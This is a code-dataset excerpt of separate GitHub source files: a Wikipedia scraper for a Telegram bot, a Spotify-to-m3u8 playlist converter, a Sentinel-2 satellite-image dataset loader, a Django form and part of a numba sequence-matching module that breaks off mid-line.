WikiSpider:\n \"\"\"\n 基于 requests 的简单维基百科爬虫\n \"\"\"\n def __init__(self, is_proxy=False):\n \"\"\"\n 初始化 requests 的各种设置\n :param is_proxy: 是否使用代理\n \"\"\"\n \n # 歧义页面\n self.ambi_board = {}\n # requests session\n self.session = requests.Session()\n # requests proxy\n self.proxies = None\n self.request_kwargs = None\n if is_proxy:\n self.proxies = {\n \"http\": \"http://127.0.0.1:1080\",\n \"https\": \"http://127.0.0.1:1080\",\n }\n\n self.request_kwargs = {\n \"proxy_url\": \"http://127.0.0.1:1080\"\n }\n # requests header\n self.wiki_headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,de;q=0.6',\n 'Accept-Encoding': 'gzip, deflate',\n 'DNT': '1',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1'\n }\n\n def tg_wiki(self, chat_id, kw):\n \"\"\"\n 用于 telegram 的查询入口\n \"\"\"\n try:\n # 尝试把 kw 当数字处理\n item_num = int(kw)\n # 如果确定是数字,则前往歧义页面进行处理\n brief = self.wiki_by_ambi_num(chat_id, item_num)\n print(brief[:120] + '...\\n')\n # bot.send_message(chat_id=chat_id, text=brief)\n return brief \n \n except ValueError:\n pass\n\n try:\n brief = self.wiki(chat_id, kw)\n if not brief:\n brief = '什么也没找到'\n print(brief[:120] + '...\\n')\n # bot.send_message(chat_id=chat_id, text=brief)\n return brief\n except IndexError:\n # bot.send_message(chat_id=chat_id, text='请输入文字')\n return '请输入文字'\n except Exception as e:\n print(e)\n\n def wiki(self, chat_id, kw):\n \"\"\"\n 依靠关键字查询主入口\n :param chat_id(int): Telegram 的对话id\n :param kw(str): 关键字 \n \"\"\"\n print('正在查询: ', kw)\n\n # 如果输入为空\n if not kw or not kw.strip():\n return '什么都没有找到'\n\n # url 前缀\n prefix = 'https://zh.wikipedia.org/wiki/'\n url = prefix + kw\n\n # 清空当前 chat 在 ambi_board 上的数据\n if chat_id in self.ambi_board:\n self.ambi_board.pop(chat_id)\n # 返回以网址查询的结果\n return self.wiki_by_url(chat_id, url)\n\n def wiki_by_ambi_num(self, chat_id, num):\n \"\"\"\n 从歧义页面中选择\n :param chat_id(int): Telegram 的对话 id\n :param num(int): 选择的序号\n \"\"\"\n url = None\n try:\n # 尝试从 ambi_board 中选取目标项目的 url\n url = self.ambi_board[chat_id][num]['url']\n except (KeyError, IndexError):\n return '输入错误,重新选择'\n if url:\n return self.wiki_by_url(chat_id, url)\n else:\n return '输入错误,重新选择'\n\n\n def wiki_by_url(self, chat_id, url):\n \"\"\"\n 对 url 发起请求,并进行内容分析处理\n :param chat_id(int): Telegram 的对话 id\n :param url(str): 所要请求的 url\n \"\"\"\n # get 请求\n r = self.session.get(url, headers=self.wiki_headers, proxies=self.proxies)\n url = r.url \n # 用 BeautifulSoup 进行处理\n soup = BeautifulSoup(r.text, 'lxml')\n\n # 歧义页面\n try:\n # 如果页面中存在歧义页面的 disambigbox 元素\n disambigbox = soup.select('#disambigbox')\n if disambigbox:\n # 提取选项列表,保存到 self.ambi_board \n ambi_list = soup.select('.mw-parser-output > ul > li')\n self.ambi_board[chat_id] = {}\n\n i = 0\n # print(ambi_list)\n for item in ambi_list:\n # item = ambi_list[i]\n # item_title = item.find_all('a')[0]['title']\n tag_a = item.find('a')\n if 'class' in tag_a.attrs and 'new' in tag_a['class']:\n continue\n item_url = 'https://zh.wikipedia.org' + tag_a['href']\n item_description = item.get_text()\n # 提取\n self.ambi_board[chat_id][i] = {\n 'url': item_url,\n 'description': item_description,\n }\n i += 1\n \n # 生成 ambi_str \n ambi_str = disambigbox[0].parent.find('p').get_text() + '\\n'\n for k, v in self.ambi_board[chat_id].items():\n ambi_str += '[{}] {}\\n'.format(k, v['description'])\n ambi_str += '输入 /wiki@wikiboy_bot+数字 选择所要查看的条目'\n return ambi_str\n except IndexError:\n return '处理内容发生错误'\n except Exception as e:\n print(e)\n return '什么都没有找到'\n\n\n # 正常页面\n brief = '' # 内容简要\n title = '' # 标题\n target_p = None # 目标的 p 元素\n try:\n title = soup.h1.get_text() + '\\n' \n main_content = soup.select('.mw-parser-output > p')\n if main_content:\n target_p = main_content[0]\n if target_p.select('span[class=\"latitude\"]') or len(target_p.get_text().strip()) < 5:\n target_p = target_p.find_next_sibling('p')\n brief = target_p.get_text()\n except Exception as e:\n print(e)\n\n # 如果没有找到 main_content 进入搜索页面\n if len(soup.select('.noarticletext')) > 0:\n try:\n search_url_prefix = 'https://zh.wikipedia.org/wiki/Special:%E6%90%9C%E7%B4%A2/'\n search_resp = requests.get(search_url_prefix + title[:-1], headers=self.wiki_headers, proxies=self.proxies)\n search_soup = BeautifulSoup(search_resp.text, 'lxml')\n search_results = search_soup.select('.mw-search-results > li > div > a')\n\n # 处理搜索结果\n # 清空歧义页面的数据\n self.ambi_board[chat_id] = {}\n ambi_str = '没有直接相关的结果,但我尝试做了搜索:'\n if len(search_results) == 0:\n return '什么都没有找到'\n for i in range(len(search_results)):\n res = search_results[i]\n item_url = 'https://zh.wikipedia.org' + res['href']\n item_description = res.get_text()\n self.ambi_board[chat_id][i] = {\n 'url': item_url,\n 'description': item_description,\n }\n ambi_str += '\\n[{}] {}'.format(i, item_description)\n ambi_str += '\\n输入 /wiki@wikiboy_bot+数字 选择所要查看的条目'\n return ambi_str\n except Exception as e:\n print(e)\n return '什么都没有找到'\n\n if not brief:\n return '什么都没有找到'\n\n # 移除所有的方括号\n brief = self.remove_brackets(brief, '[]')\n return title + brief + '\\n' + url\n\n\n def remove_brackets(self, text, bracket_pair):\n \"\"\"\n 移除字符串 text 当中的某类括号,以及括号内的内容\n (没用正则写挺蠢的)\n \"\"\"\n left = bracket_pair[0]\n right = bracket_pair[1]\n depth = 0\n left_marks = []\n right_marks = []\n for i in range(len(text)):\n if text[i] == left:\n if depth == 0:\n left_marks.append(i)\n depth += 1\n if text[i] == right:\n depth -= 1\n if depth == 0:\n right_marks.append(i)\n if depth != 0 or len(left_marks) != len(right_marks):\n return text\n left_marks.append(len(text))\n right_marks.insert(0, -1)\n new_text = ''\n for i in range(len(left_marks)):\n new_text += text[right_marks[i] + 1: left_marks[i]]\n return new_text", "repo_name": "lvix/wikiboy", "sub_path": "wiki_spider.py", "file_name": "wiki_spider.py", "file_ext": "py", "file_size_in_byte": 8849, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 120, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 180, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 181, "usage_type": "call"}]} +{"seq_id": "15167579655", "text": "import os\nimport argparse\nfrom spotify.client import get_spotify_client\nfrom spotify.playlist import get_tracks_from_spotify_playlist\nfrom utils.text_processing import normalize_text\n\ndef create_m3u8_file(tracks, music_folder, output_file):\n \"\"\"Creates an m3u8 playlist file from a list of track names.\n \n Args:\n tracks (list): A list of track dictionaries.\n music_folder (str): Path to the folder containing the music files.\n output_file (str): Path to the output m3u8 file.\n \n Returns:\n None\n \"\"\"\n missing_tracks = []\n \n with open(output_file, 'w', encoding='utf-8') as f:\n f.write(\"#EXTM3U\\n\")\n for track in tracks:\n track_found = False\n for root, dirs, files in os.walk(music_folder):\n for file in files:\n normalized_file = normalize_text(file)\n if track['normalized_artist'] in normalized_file and track['normalized_title'] in normalized_file:\n f.write(os.path.join(root, file) + \"\\n\")\n track_found = True\n break\n if not track_found:\n missing_tracks.append(track['artist_title'])\n \n if missing_tracks:\n print(\"The following tracks were not found in your music library and have not been added to the playlist:\")\n for track in missing_tracks:\n print(f\"- {track}\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Convert Spotify playlists to m3u8 format.\")\n parser.add_argument(\"playlist_file\", help=\"Text file containing the Spotify playlist URLs or IDs, one per line.\")\n parser.add_argument(\"music_folder\", help=\"Path to the folder containing the music files.\")\n parser.add_argument(\"output_dir\", help=\"Directory to save the output m3u8 files.\")\n args = parser.parse_args()\n\n spotify = get_spotify_client()\n\n with open(args.playlist_file, 'r') as file:\n playlist_ids = [line.strip() for line in file]\n\n for playlist_id in playlist_ids:\n tracks = get_tracks_from_spotify_playlist(playlist_id)\n if not tracks:\n continue\n\n # Fetch the playlist name for the output file\n playlist_info = spotify.playlist(playlist_id)\n playlist_name = playlist_info['name']\n output_file = os.path.join(args.output_dir, f\"{playlist_name}.m3u8\")\n\n print(f\"Processing playlist: {playlist_name}\")\n\n create_m3u8_file(tracks, args.music_folder, output_file)\n print(f\"Playlist has been saved to {output_file}\")\n\nif __name__ == \"__main__\":\n main()", "repo_name": "MichelleAppel/SpotifyToM3U8", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.text_processing.normalize_text", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 40, "usage_type": "call"}, {"api_name": "spotify.client", "line_number": 46, "usage_type": "name"}, {"api_name": "spotify.client.get_spotify_client", "line_number": 46, "usage_type": "call"}, {"api_name": "spotify.playlist.get_tracks_from_spotify_playlist", "line_number": 52, "usage_type": "call"}, {"api_name": "spotify.client.playlist", "line_number": 57, "usage_type": "call"}, {"api_name": "spotify.client", "line_number": 57, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "4855677162", "text": "\"\"\"A single image dataset for a specific satellite and specific month.\"\"\"\n\nimport os\nfrom pathlib import Path\nfrom typing import Sequence, Optional, Callable, Dict, Any\nimport warnings\n\nimport fsspec\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport rasterio\nfrom rasterio.io import MemoryFile\nimport torch\nfrom torch import Tensor\nfrom torch.utils.data import Dataset, DataLoader\n\n# Our rasters contain no geolocation info, so silence this warning from rasterio\nwarnings.filterwarnings(\"ignore\", category=rasterio.errors.NotGeoreferencedWarning)\n\n\ndef load_raster(file_url: str) -> Tensor:\n \"\"\"Returns the data as tensor.\"\"\"\n # this is for local testing only ---\n # S2_IMG_DIM = (11, 256, 256)\n # if not os.path.exists(file_url):\n # array = np.random.randn(S2_IMG_DIM)\n # --- end local test ---\n storage_options = {'anon': True}\n with fsspec.open(file_url, **storage_options).open() as f:\n raw_bytes = f.read()\n # Save bytes to array\n with MemoryFile(raw_bytes) as memfile:\n with memfile.open() as buffer:\n array = buffer.read()\n if array.dtype == np.uint16:\n array = array.astype(np.float)\n return torch.tensor(array, dtype=torch.float32)\n\n\nclass Sentinel2(Dataset):\n \"\"\"Sentinel-2 Dataset.\n \n Sentinel-2 (S2) is a high-resolution imaging mission that monitors vegetation,\n soil, water cover, inland waterways, and coastal areas. S2 satellites have a\n Multispectral Instrument (MSI) on board that collects data in the visible,\n near-infrared, and short-wave infrared portions of the electromagnetic spectrum.\n Sentinel-2 measures spectral bands that range from 400 to 2400 nanometers.\n Sentinel-2 has a 6-day revisit orbit, which means that it returns to the same \n area about five times per month. The best image for each month is selected from \n the S2 data.\n\n The following 11 bands are provided for each S2 image:\n B2, B3, B4, B5, B6, B7, B8, B8A, B11, B12, and CLP (a cloud probability layer).\n See the `Sentinel-2 guide `_ for a description of each band.\n\n The CLP band — cloud probability — is provided because S2 cannot penetrate clouds.\n The cloud probability layer has values from 0-100, indicating the percentage\n probability of cloud cover for that pixel. In some images, this layer may have\n a value of 255, which indicates that the layer has been obscured due to excessive\n noise.\n\n For information on the satellite data and its sources, check out the competiton `About Page `_.\n \"\"\"\n\n all_bands = [\n \"B2\",\n \"B3\",\n \"B4\",\n \"B5\",\n \"B6\",\n \"B7\",\n \"B8\",\n \"B8A\",\n \"B11\",\n \"B12\",\n \"CLP\"\n ]\n\n month_map = {\n \"september\": \"00\",\n \"october\": \"01\",\n \"november\": \"02\",\n \"december\": \"03\",\n \"january\": \"04\",\n \"february\": \"05\",\n \"march\": \"06\",\n \"april\": \"07\",\n \"may\": \"08\",\n \"june\": \"09\",\n \"july\": \"10\",\n \"august\": \"11\"\n }\n\n # Setup S3 URLs and folder locations within the S3 bucket\n # S3_URL = \"s3://drivendata-competition-biomassters-public-us\"\n S3_URL = \"/datasets/biomassters\"\n metadata_file = \"/notebooks/data/metadata_parquet/features_metadata_slim.parquet\"\n \n def __init__(self, \n metadata_file: str = \"\",\n data_url: str = \"\",\n bands: Sequence[str] = [], \n month: str =\"april\",\n train: bool = True, \n transform: Optional[Callable[[Dict[str, Any]], Dict[str, Any]]] = None, \n target_transform: Optional[Callable[[Dict[str, Any]], Dict[str, Any]]] = None\n ) -> None:\n \"\"\" Initialize a new instance of the Sentinel-2 Dataset.\n Args:\n \"\"\"\n if not metadata_file:\n metadata_file = self.metadata_file\n if not os.path.exists(metadata_file):\n raise FileNotFoundError(f\"File {metadata_file} not found! \"\n \"Please check the path and make sure the file exists.\"\n )\n # Data URL resolution\n if not data_url:\n data_url = self.S3_URL\n \n self.bands = bands if bands else self.all_bands\n self.month = month\n self.train = train\n self.transform = transform\n self.target_transform = target_transform\n \n if self.train:\n self.features_dir = data_url + \"/train_features\"\n self.targets_dir = data_url + \"/train_agbm\"\n else:\n self.features_dir = data_url + \"/test_features\"\n self.targets_dir = \"\"\n\n\n if metadata_file.endswith(\".parquet\"):\n metadata_df = pd.read_parquet(metadata_file)\n elif metadata_file.endswith(\".csv\"):\n metadata_df = pd.read_csv(metadata_file)\n else:\n raise Exception(f\"Unsupported format for metadata file: {metadata_file}. \"\n \"Only CSV and Parquet format files are supported.\")\n\n self.month_id = self.month_map[month]\n\n if self.train:\n self.chip_ids = metadata_df[metadata_df.split == \"train\"].chip_id.unique()\n else:\n self.chip_ids = metadata_df[metadata_df.split == \"test\"].chip_id.unique()\n\n def __len__(self):\n \"\"\"Return the length of the dataset.\"\"\"\n return len(self.chip_ids)\n\n def __getitem__(self, idx):\n \"\"\"Return a single (image, label) corresponding to idx.\"\"\"\n # Input image\n img_path = self.features_dir + f\"/{self.chip_ids[idx]}_S2_{self.month_id}.tif\"\n img_data = load_raster(img_path)[:10] # only first 10 channels, leave out cloud coverage channel\n\n if self.transform is not None:\n img_data = self.transform(img_data)\n\n # Target image\n target_data = None\n if self.train:\n target_path = self.targets_dir + f\"/{self.chip_ids[idx]}_agbm.tif\"\n target_data = load_raster(target_path)\n if self.target_transform is not None:\n target_data = self.target_transform(target_data)\n\n return {'image': img_data,\n 'target': target_data,\n 'chip_id': self.chip_ids[idx]}\n\n def plot(\n self,\n sample: Dict[str, Any],\n show_titles: bool = True,\n suptitle: Optional[str] = None,\n ) -> plt.Figure:\n \"\"\"Plot a sample from the dataset.\n Args:\n sample: a sample returned by :meth:`RasterDataset.__getitem__`\n show_titles: flag indicating whether to show titles above each panel\n suptitle: optional string to use as a suptitle\n Returns:\n a matplotlib Figure with the rendered sample\n Raises:\n ValueError: if the RGB bands are not included in ``self.bands``\n .. versionchanged:: 0.3\n Method now takes a sample dict, not a Tensor. Additionally, possible to\n show subplot titles and/or use a custom suptitle.\n \"\"\"\n rgb_indices = []\n for band in self.RGB_BANDS:\n if band in self.bands:\n rgb_indices.append(self.bands.index(band))\n else:\n raise ValueError(\"Dataset doesn't contain some of the RGB bands\")\n\n image = sample[\"image\"][rgb_indices].permute(1, 2, 0)\n image = torch.clamp(image / 2000, min=0, max=1)\n\n fig, ax = plt.subplots(1, 1, figsize=(4, 4))\n\n ax.imshow(image)\n ax.axis(\"off\")\n\n if show_titles:\n ax.set_title(\"Image\")\n\n if suptitle is not None:\n plt.suptitle(suptitle)\n\n return ", "repo_name": "goopyflux/BioMassters", "sub_path": "src/biomasstry/datasets/sentinel2.py", "file_name": "sentinel2.py", "file_ext": "py", "file_size_in_byte": 7822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 19, "usage_type": "call"}, {"api_name": "rasterio.errors", "line_number": 19, "usage_type": "attribute"}, {"api_name": "fsspec.open", "line_number": 30, "usage_type": "call"}, {"api_name": "rasterio.io.MemoryFile", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pandas.read_parquet", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 181, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}]} +{"seq_id": "72165695206", "text": "from django import forms\nfrom .models import Post\n\nclass PostModelForm(forms.ModelForm):\n content = forms.CharField(label='',\n widget=forms.Textarea(attrs={'placeholder':'Whats are you thinking?', 'class':'form-control form-control-lg mb-3'}\n ))\n class Meta:\n model = Post\n fields = [\n 'content',\n ]\n\n def clean_content(self,*args, **kwargs):\n content = self.cleaned_data.get(\"content\")\n if content == \"\":\n raise forms.ValidationError(\"Field cannot be empty\")\n return content\n\n", "repo_name": "georgianamit/CodeColeo", "sub_path": "src/posts/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 5, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "74416496165", "text": "\"\"\"\nThis module implements the matching routine, by JIT compiling the code \nfor each input separately using Numba. \n\"\"\"\n\nimport inspect\nimport sys\nfrom typing import Callable, Union\n\nimport awkward as ak\nimport numba as nb\nimport numpy as np\nfrom numba.typed import List\nimport awkward.layout as ak_layout\n\nfrom . import codegen as cg\nfrom .primitives import *\n\n__all__ = [\"match_pattern\", \"extract_pattern\"]\n\n\n# -----------------------------------------------------------\n# matching sequences using the given pattern\n# -----------------------------------------------------------\n\n\n@nb.experimental.jitclass\nclass PatternInfo:\n length: int\n idx_start: int\n idx_end: int\n event_min_counts: nb.int64[:] # type:ignore\n event_max_counts: nb.int64[:] # type:ignore\n match_seq_start: bool\n match_seq_end: bool\n match_all: bool\n allow_overlaps: bool\n\n def __init__(\n self,\n length: int,\n idx_start: int,\n idx_end: int,\n event_min_counts: np.ndarray,\n event_max_counts: np.ndarray,\n match_seq_start: bool,\n match_seq_end: bool,\n match_all: bool,\n allow_overlaps: bool,\n ):\n self.length = length\n self.idx_start = idx_start\n self.idx_end = idx_end\n self.event_min_counts = event_min_counts\n self.event_max_counts = event_max_counts\n self.match_seq_start = match_seq_start\n self.match_seq_end = match_seq_end\n self.match_all = match_all\n self.allow_overlaps = allow_overlaps\n\n\ndef type_getitem(typ):\n t = typ.type.getitem_at_check(typ)(typ, nb.int64)\n return t.return_type\n\n\n_compiled_registry = {}\n\n\ndef match_pattern(pat: SeqPattern, sequences: ak.Array) -> ak.Array:\n \"\"\"Wrapper that jit compiles numba functions to match the given pattern, and returns a list of\n identifiers for the matched sequences.\n \"\"\"\n pat_info = PatternInfo(\n len(pat.event_patterns),\n pat.idx_start_event if pat.idx_start_event else -1,\n pat.idx_end_event if pat.idx_end_event else -1,\n np.asarray([p.min_count for p in pat.event_patterns], dtype=np.int64),\n np.asarray([p.max_count for p in pat.event_patterns], dtype=np.int64),\n pat.match_seq_start,\n pat.match_seq_end,\n pat.match_all,\n pat.allow_overlaps,\n )\n\n cache_id = pat.pattern_str + (pat.code if pat.code is not None else \"\")\n # check if code exists as a cached file, else generate and store it\n if not cg.present_in_cache(cache_id):\n list_fns = cg.generate_match_fns(pat)\n\n code_str = \"\"\n for _imp in (\n \"import numba as nb\",\n \"import numpy as np\",\n \"import awkward as ak\",\n \"from numba.typed import List\",\n ):\n code_str += _imp + \"\\n\"\n\n for _func in list_fns:\n code_str += \"\\n\" + cg.ast_to_code(_func) + \"\\n\"\n code_str += \"\\n\" + cg.seq_post_filter_fn(pat) + \"\\n\"\n code_str += \"\\n\" + inspect.getsource(match_sequence_here) + \"\\n\"\n cg.write_to_cache(cache_id, code_str)\n\n jit_mod = cg.import_from_cache(cache_id)\n\n typ_seq_item = type_getitem(nb.typeof(sequences))\n typ_events_item = type_getitem(nb.typeof(sequences[\"events\"]))\n typ_np_array = nb.typeof(np.zeros(5, np.int64))\n typ_inputs = (\n nb.typeof(pat_info),\n nb.typeof(sequences),\n nb.types.FunctionType(nb.bool_(typ_seq_item)),\n nb.types.FunctionType(nb.bool_(typ_seq_item, typ_np_array)),\n nb.types.FunctionType(\n nb.bool_(\n nb.typeof(pat_info),\n nb.int64,\n typ_events_item,\n nb.int64,\n typ_np_array,\n typ_np_array,\n )\n ),\n )\n if typ_inputs in _compiled_registry:\n fn = _compiled_registry[typ_inputs]\n else:\n fn = nb.jit(\n typ_inputs, nopython=True, locals={\"pos\": nb.int64, \"pat_pos\": nb.int64}\n )(_match_pattern)\n _compiled_registry[typ_inputs] = fn\n\n res = fn(\n pat_info,\n sequences,\n jit_mod.match_seq_pre,\n jit_mod.match_seq_post,\n jit_mod.match_sequence_here,\n ) # type: tuple[list[np.ndarray], ...]\n\n list_match_seq_ids, list_match_indices, list_match_counts = res\n match_seq_ids = np.concatenate(list_match_seq_ids)\n match_indices = np.concatenate(list_match_indices)\n match_counts = np.concatenate(list_match_counts)\n\n # filter down to legit matches\n valid_indices = match_seq_ids >= 0\n match_seq_ids = match_seq_ids[valid_indices]\n match_indices = match_indices[valid_indices]\n match_counts = match_counts[valid_indices]\n\n return ak.Array(\n {\n \"seq_id\": match_seq_ids,\n \"evt_indices\": match_indices,\n \"evt_counts\": match_counts,\n }\n )\n\n\ndef _match_pattern(\n pat: \"PatternInfo\",\n sequences: \"ak.Array\",\n match_seq_pre: Callable[..., bool],\n match_seq_post: Callable[..., bool],\n match_seq_here: Callable[..., bool],\n) -> tuple[list[np.ndarray], ...]:\n \"\"\"Match the pattern against the sequences.\n\n NOTE: This routine is jit compiled with Numba. We handle jitting it manually by specifying the\n inputs, since Numba produces two specializations otherwise - one where the input list of sequences\n is nullable. I am not sure why.\n \"\"\"\n num_sequences = len(sequences)\n\n # List of numpy arrays to output.\n # A cleaner option would be to output a list of structs instead but we want to keep allocations to\n # a minimum. So, initialize numpy arrays to record it, and when we run out of space, create a new\n # numpy array and append it to the list.\n # Another alternative would be to resize the array each time we run out of space, but numba copies\n # the array elements one at a time which is slow. Numpy likely just copies the buffer directly.\n list_match_seq_ids = List()\n list_match_indices = List()\n list_match_counts = List()\n\n def _gen_arrays():\n list_match_seq_ids.append(np.full(num_sequences, -1, dtype=np.int64))\n list_match_indices.append(np.zeros((num_sequences, pat.length), dtype=np.int64))\n list_match_counts.append(np.zeros((num_sequences, pat.length), dtype=np.int64))\n return (\n list_match_seq_ids[-1],\n list_match_indices[-1],\n list_match_counts[-1],\n )\n\n match_seq_ids, match_indices, match_counts = _gen_arrays()\n out_idx = 0 # index into the current set of match arrays, resets each time we run out of space\n\n for seq_id in range(num_sequences):\n seq = sequences[seq_id]\n\n # filter against the sequence properties\n if not match_seq_pre(seq): # type: ignore\n continue\n\n events = seq[\"events\"] # type:ignore\n num_events = len(events)\n\n # NOTE: this variable isn't mutated. Numba creates extra specializations, treating it as a literal in\n # addition to int64. We just want to avoid it.\n pat_pos = 0\n pos = 0\n start_before = 1 if pat.match_seq_start else num_events\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < start_before:\n if (\n match_seq_here(\n pat,\n pat_pos,\n events,\n pos,\n match_indices[out_idx],\n match_counts[out_idx],\n )\n and match_seq_post(seq, match_indices[out_idx])\n ):\n if pat.allow_overlaps:\n # start matching from the next event in the sequence\n pos += 1\n elif pat.idx_end >= 0:\n # start matching after the current match ends\n pos = (\n match_indices[out_idx][pat.idx_end]\n + match_counts[out_idx][pat.idx_end]\n )\n else:\n # subsequences go until the end by default\n pos = num_events\n\n # fill in the output arrays\n\n # match_indices and match_counts arrays were already mutated while matching\n match_seq_ids[out_idx] = seq_id\n # update the running output index\n out_idx += 1\n # create more space if needed\n if out_idx == num_sequences:\n match_seq_ids, match_indices, match_counts = _gen_arrays()\n out_idx = 0\n\n # conclude if we need to match only the first occurrence\n if not pat.match_all:\n break\n\n else:\n pos += 1\n\n return (list_match_seq_ids, list_match_indices, list_match_counts) # type: ignore\n\n\n@nb.jit(nopython=True)\ndef match_sequence_here(\n pat: \"PatternInfo\",\n pat_pos: \"int\",\n events: \"ak.Array\",\n events_pos: \"int\",\n cut_match_indices: \"np.ndarray\",\n cut_match_counts: \"np.ndarray\",\n) -> \"bool\":\n \"\"\"Match the events in the sequence starting at the given position of the pattern.\n\n NOTE: This routine is put into the generated file for matching a sepcific pattern,\n and then jit compiled.\n \"\"\"\n\n min_to_match = pat.event_min_counts[pat_pos]\n max_to_match = pat.event_max_counts[pat_pos]\n num_events = len(events)\n\n pos = events_pos\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < events_pos + min_to_match:\n # more events to match than present in the sequence\n if pos >= num_events:\n return False\n if not match_event(pat_pos, events, pos, cut_match_indices): # type: ignore\n return False\n pos += 1\n cut_match_indices[pat_pos] = events_pos\n cut_match_counts[pat_pos] = min_to_match\n\n pos_limit = num_events\n if max_to_match > 0:\n pos_limit = min(pos_limit, events_pos + max_to_match)\n\n # check if the pattern has more events left to match\n assert pos == events_pos + min_to_match\n if pat_pos < pat.length - 1:\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < pos_limit:\n if match_sequence_here(\n pat, pat_pos + 1, events, pos, cut_match_indices, cut_match_counts\n ):\n # if the rest of the pattern matches rest of the sequence, we have a match\n # since we already matched min_count copies of current event\n return True\n elif match_event(pat_pos, events, pos, cut_match_indices): # type: ignore\n # we have some leeway to match more of the current event\n cut_match_counts[pat_pos] += 1\n pos += 1\n else:\n # we couldn't match any further of the pattern\n return False\n\n # we have matched all copies of the current event, onto the next\n if pos < num_events:\n # the sequence has more events to match to\n if match_sequence_here(\n pat, pat_pos + 1, events, pos, cut_match_indices, cut_match_counts\n ):\n return True\n else:\n return False\n else:\n # no events left in the sequence but the pattern has more left\n return False\n else:\n # pattern has no more events to match, so match as many of the current event as feasible\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < pos_limit:\n if not match_event(pat_pos, events, pos, cut_match_indices): # type: ignore\n break\n else:\n pos += 1\n cut_match_indices[pat_pos] += 1\n\n # check if the pattern needed to match at the end of the sequence\n if pat.match_seq_end and pos < num_events:\n return False\n else:\n return True\n\n\n# -----------------------------------------------------------\n# matching sequences and extracting the matched subsequences\n# -----------------------------------------------------------\n\n\ndef get_full_offsets_n_records(content: ak_layout.Content):\n \"\"\"Events is an array with layout as a list-type content, or the same\n thing wrapped under one or more IndexedArray or UnmaskedArray.\n \"\"\"\n from awkward._util import listtypes\n\n if not isinstance(content, listtypes):\n return get_full_offsets_n_records(content.content)\n else:\n if isinstance(content, ak_layout.RegularArray):\n starts = 